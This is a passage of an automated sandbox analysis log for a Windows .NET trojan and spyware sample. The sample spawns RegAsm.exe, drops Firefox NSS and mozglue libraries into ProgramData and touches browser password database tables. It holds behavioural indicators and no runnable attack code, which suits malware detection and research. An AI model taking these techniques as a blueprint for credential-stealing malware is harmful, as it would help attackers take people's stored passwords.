                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402290 appears 286 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C9709D0 appears 99 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C7194D0 appears 88 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C70CBE8 appears 134 times
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7472 -s 932
                      Source: file.exeStatic PE information: invalid certificate
                      Source: file.exe, 00000000.00000002.1701772300.0000000002EC3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFriendly.exe4 vs file.exe
                      Source: file.exe, 00000000.00000002.1701210814.000000000103E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                      Source: file.exe, 00000000.00000000.1613149582.0000000000C5A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFriendly.exe4 vs file.exe
                      Source: file.exeBinary or memory string: OriginalFilenameFriendly.exe4 vs file.exe
                      Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/30@1/2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C737030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,3_2_6C737030
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00410950 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,3_2_00410950
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004110A0 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear,3_2_004110A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199658817715[1].htmJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7472
                      Source: C:\Users\user\Desktop\file.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7480:120:WilError_03
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\dba7a0c9-4f22-4d27-8173-863aa989d419Jump to behavior
                      Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                      Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlm[1].dll.3.dr, nss3.dll.3.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                      Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlm[1].dll.3.dr, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                      Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlm[1].dll.3.dr, nss3.dll.3.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                      Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlm[1].dll.3.dr, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                      Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                      Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.3.drBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                      Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                      Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                      Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                      Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.3.drBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                      Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                      Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlm[1].dll.3.dr, nss3.dll.3.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                      Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlm[1].dll.3.dr, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                      Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                      Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.3.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                      Source: GHDHDBAECGCAFHJJDAKF.3.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.3.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                      Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                      Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.3.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                      Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                      Source: file.exeVirustotal: Detection: 29%
                      Source: RegAsm.exeString found in binary or memory: t-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?ui=en-us&rs=en-us&ad=us https://support.
                      Source: RegAsm.exeString found in binary or memory: 48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?ui=en-us&rs=en-us&ad=us https://support.office.co
                      Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7472 -s 932
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
                      Source: Binary string: freebl3.pdb source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
                      Source: Binary string: freebl3.pdbp source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
                      Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
                      Source: Binary string: mscorlib.pdb source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: System.ni.pdbRSDS source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: mscorlib.ni.pdb source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: Friendly.pdb source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
                      Source: Binary string: System.pdb4 source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: System.Core.pdb source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.3.dr, vcruntime140[1].dll.3.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
                      Source: Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
                      Source: Binary string: mscorlib.ni.pdbRSDS source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.3.dr
                      Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
                      Source: Binary string: c:\nconvxoz3\obj\Release\Friendly.pdb source: file.exe
                      Source: Binary string: softokn3.pdb source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
                      Source: Binary string: System.ni.pdb source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: System.pdb source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: System.Core.ni.pdbRSDS source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: System.Core.ni.pdb source: WERD260.tmp.dmp.6.dr
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004181D0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_004181D0
                      Source: msvcp140.dll.3.drStatic PE information: section name: .didat
                      Source: msvcp140[1].dll.3.drStatic PE information: section name: .didat
                      Source: nss3.dll.3.drStatic PE information: section name: .00cfg
                      Source: nss3[1].dll.3.drStatic PE information: section name: .00cfg
                      Source: softokn3.dll.3.drStatic PE information: section name: .00cfg
                      Source: softokn3[1].dll.3.drStatic PE information: section name: .00cfg
                      Source: sqlm[1].dll.3.drStatic PE information: section name: .00cfg
                      Source: freebl3.dll.3.drStatic PE information: section name: .00cfg
                      Source: freebl3[1].dll.3.drStatic PE information: section name: .00cfg
                      Source: mozglue.dll.3.drStatic PE information: section name: .00cfg
                      Source: mozglue[1].dll.3.drStatic PE information: section name: .00cfg
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041A115 push ecx; ret 3_2_0041A128
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C70B536 push ecx; ret 3_2_6C70B549
                      Source: file.exeStatic PE information: section name: .text entropy: 7.97607995169573
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlm[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004181D0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_004181D0
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
